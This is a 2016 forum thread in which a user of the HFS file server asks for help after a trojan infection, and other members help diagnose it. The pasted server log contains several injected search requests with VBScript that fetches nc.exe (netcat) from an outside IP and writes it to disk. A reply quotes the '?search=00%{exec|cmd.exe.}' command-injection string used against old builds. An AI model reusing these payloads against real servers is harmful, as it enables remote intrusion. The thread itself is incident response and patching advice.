Author Topic: i've been hacked  (Read 1788 times)

0 Members and 1 Guest are viewing this topic.

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
    • View Profile
i've been hacked
« on: March 09, 2016, 03:10:25 PM »
Hello all!

Today my antivirus told me, that trojan was deleted. It was a vbs-script, i've opened it in N++ and here it is on screenshot.

After that i've started try to found, how it happened. And i found it. HFS working on  80 port, and every day i have a lot of messages of "requested GET" and "trying to upload xml". I've opened HFS and saw it (look screenshot).

I've exported full log to txt file and here it is:

Code: [Select]
9:24:21 150.70.188.172:53306 Requested GET /
9:31:24 150.70.173.52:45675 Requested GET /
10:33:11 150.70.188.182:45937 Requested GET /
12:42:17 127.0.0.1:58565 Upload failed, Folder not found: getstring.xml
13:10:33 150.70.188.178:57561 Requested GET /
15:19:09 150.70.188.178:52023 Requested GET /
15:36:46 150.70.173.43:58891 Requested GET /
17:06:33 150.70.173.7:48701 Requested GET /
18:37:18 150.70.188.181:50506 Requested GET /
19:07:36 150.70.173.57:57074 Requested GET /
20:01:32 188.138.1.218:42693 Requested GET /
21:58:16 188.32.198.69:17087 Requested GET /
14:03:59 127.0.0.1:64139 Upload failed, Folder not found: getstring.xml
21:34:42 150.70.173.10:54565 Requested GET /
23:49:04 150.70.188.172:57408 Requested GET /
0:05:27 150.70.173.8:56183 Requested GET /
0:35:08 150.70.188.169:41555 Requested GET /
3:21:10 150.70.188.166:44530 Requested GET /
4:36:26 150.70.97.86:48072 Requested GET /
6:51:26 150.70.173.49:34699 Requested GET /
7:13:12 185.130.5.146:41838 Requested HEAD /
7:27:38 94.102.49.78:32822 Requested GET /
10:14:02 95.220.12.221:56833 Requested GET /
10:14:02 95.220.12.221:56841 Requested GET /
11:36:21 150.70.188.182:36670 Requested GET /
11:50:43 150.70.173.55:57792 Requested GET /
12:54:18 150.70.188.179:46689 Requested GET /
13:59:29 150.70.173.44:58075 Requested GET /
14:04:32 127.0.0.1:61309 Upload failed, Folder not found: getstring.xml
23:53:11 150.70.188.180:38578 Requested GET /
2:39:02 162.13.170.123:60331 Requested GET /
14:05:32 127.0.0.1:58712 Upload failed, Folder not found: getstring.xml
14:14:29 193.124.183.62:59434 Requested GET /
18:38:16 150.70.188.165:52615 Requested GET /
0:53:07 150.70.188.180:38067 Requested GET /
3:02:21 150.70.173.41:58793 Requested GET /
4:21:49 37.153.173.10:57460 Requested GET /
5:25:08 185.129.62.62:55354 Requested GET /
5:45:42 185.65.135.227:54500 Requested GET /
6:58:03 171.25.193.131:22518 Requested GET /
9:45:22 150.70.173.5:41667 Requested GET /
11:56:00 193.124.183.62:50858 Requested GET /
12:24:58 185.130.5.146:47664 Requested HEAD /
14:06:30 127.0.0.1:51959 Upload failed, Folder not found: getstring.xml
16:53:28 163.172.13.21:63567 Requested GET /
17:53:59 66.240.192.138:51136 Requested GET /
18:17:14 150.70.188.171:37191 Requested GET /
21:19:42 159.224.52.241:57673 Requested GET /
22:04:44 150.70.173.40:58734 Requested GET /
23:13:02 193.124.183.62:62283 Requested GET /
0:27:39 162.13.170.123:56872 Requested GET /
4:04:43 188.32.105.181:65077 Requested GET /
4:09:21 150.70.173.58:34591 Requested GET /
5:16:26 77.247.181.162:46931 Requested GET /
7:49:13 51.254.44.137:41738 Requested GET /
9:49:22 150.70.188.178:55827 Requested GET /
10:38:10 193.124.183.62:61670 Requested GET /
14:07:31 127.0.0.1:54231 Upload failed, Folder not found: getstring.xml
15:42:55 185.130.5.146:39691 Requested HEAD /
17:24:32 137.226.113.7:44838 Requested GET /
19:15:21 193.124.183.62:55358 Requested GET /
1:46:28 188.138.1.218:59867 Requested GET /
3:10:43 62.210.162.182:41469 Requested GET /
3:10:45 62.210.162.182:48773 Requested GET /
4:50:19 176.10.99.206:60831 Requested GET /
5:05:30 112.115.19.84:60662 Requested GET /
5:06:00 112.115.19.84:60676 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:03 112.115.19.84:60677 Requested GET /?search=5:06:04 112.115.19.84:60678 Requested GET /?search=5:06:10 112.115.19.84:60679 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:06:13 112.115.19.84:60680 Requested GET /?search=5:06:14 112.115.19.84:60681 Requested GET /?search=5:17:19 112.115.19.84:60818 Requested GET /
5:17:46 112.115.19.84:60839 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:17:49 112.115.19.84:60840 Requested GET /?search=5:17:49 112.115.19.84:60841 Requested GET /?search=5:17:58 112.115.19.84:60842 Requested GET /?search=> dim bStrm: Set bStrm = createobject("Adodb.Stream")
> xHttp.Open "GET", "http://150.129.217.214/nc.exe", False
> xHttp.Send
>
> with bStrm
>     .type = 1 '//binary
>     .open
>     .write xHttp.responseBody
>     .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
> end with.}
5:18:00 112.115.19.84:60843 Requested GET /?search=5:18:01 112.115.19.84:60844 Requested GET /?search=5:32:09 150.70.188.181:42913 Requested GET /
5:58:29 150.70.188.181:42625 Requested GET /

So, what should i do, to prevent same situations? Now i switched off HFS+, but i really need it. Let me know, how to prevent illegal actions. Thanks!

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1882
    • View Profile
Re: i've been hacked
« Reply #1 on: March 09, 2016, 11:01:10 PM »
very strange??

target ip for nc.exe is a HFS web server

vbs script probably come from another source

What you can do is to make a log to file and select  "request dump" and eventually "reply" to obtain more information about connections

if possible block all communication from an to this ip in your firewall

« Last Edit: March 09, 2016, 11:20:27 PM by Mars »

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
    • View Profile
Re: i've been hacked
« Reply #2 on: March 10, 2016, 06:16:51 AM »
VBS script came from HFS+, as you could see, throught HFS vulnerability. Hacker put special command in search field and file has been created on my pc. Is there anyone of admins, or technicians? I guess, tgey should know about that. My fault, that root directory haven't a password. Now, i've protected it by password, so hacker cant access to search field. 2nd step was an update of HFS - from 2.3 to 2.3g.

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1882
    • View Profile
Re: i've been hacked
« Reply #3 on: March 10, 2016, 10:46:15 AM »
with the last build you can be reassured, because you were using version 289 that was sensitive to the cmd attack by url with "? search = 00%{exec|cmd.exe.}"

similarly as explain in this post about build 287, build 289 was not protected
http://www.rejetto.com/forum/bug-reports/uploading-backdor-in-287/msg1060051/#msg1060051
since hfs 2.3d build 292 the problem is solved,

because I have certain privileges here, it is possible for me to access the home page of your server from your IP, I see that you have made an update of hfs with the latest version, so you no longer risk being injured party in the same attack
 
you can now rest easy ;)

strangely HFS server complained to the IP address 150.129.217.214 is no longer available

the "hacker" is not a stranger on  the forum
 ;D ;D
« Last Edit: March 10, 2016, 11:07:59 AM by Mars »

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
    • View Profile
Re: i've been hacked
« Reply #4 on: March 11, 2016, 07:51:00 PM »
Thanks for your reply! Ok, now i've set password for root directory, and 'search field' now is unavailable. Thanks!

Offline userhfs

  • Occasional poster
  • *
  • Posts: 4
    • View Profile
Re: i've been hacked
« Reply #5 on: March 12, 2016, 08:38:02 PM »
Adn could someone tell me, what does it mean?

Code: [Select]
14:11:08 127.0.0.1:55616 Upload failed for getstring.xml: Folder not found.
14:11:08 127.0.0.1:55616 Upload failed getstring.xml
18:13:23 Check update: no new version

Offline LeoNeeson

  • Tireless poster
  • ****
  • Posts: 579
  • Solitario...
    • View Profile
    • twitter.com/LeoNeeson
Re: i've been hacked
« Reply #6 on: March 13, 2016, 10:04:25 AM »
By doing a lookup on that IP address range, it seems that 150.70.*.* (which appears a lot in your log), it seems to belong to "trendmicro.com" company, in Japan. May be this company was scanning your server, or doing something weird? I don't know, but it doesn't look like an IP address from a normal ISP.

The IP 150.129.217.214 is from some ISP in China, and may be some attacker. Well, I'm not expert on this, but there is no more public information about who may be behind this (only that Chinese ISP knows who was the end user, if that user wasn't browsing from a public Cybercafe).
HFS in Spanish (HFS en Español) / How to compile HFS (Tutorial)
• I'm open to help and share any file you may need (just ask me) ;)

Offline Mars

  • Operator
  • Tireless poster
  • *****
  • Posts: 1882
    • View Profile
Re: i've been hacked
« Reply #7 on: March 13, 2016, 09:58:30 PM »
Using this software, you will see what is the process in real time using the address 127.0.0.1 remotely on port 80

unzip and run TCPView.exe, probably you can have an alert from protect sotfware, you can ignore it without risk.

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12949
    • View Profile
Re: i've been hacked
« Reply #8 on: March 14, 2016, 10:25:16 PM »
i'm sorry for this accident, but it's a bad idea to have a server on the internet and not let it update.

Follow members gave a thank to your post: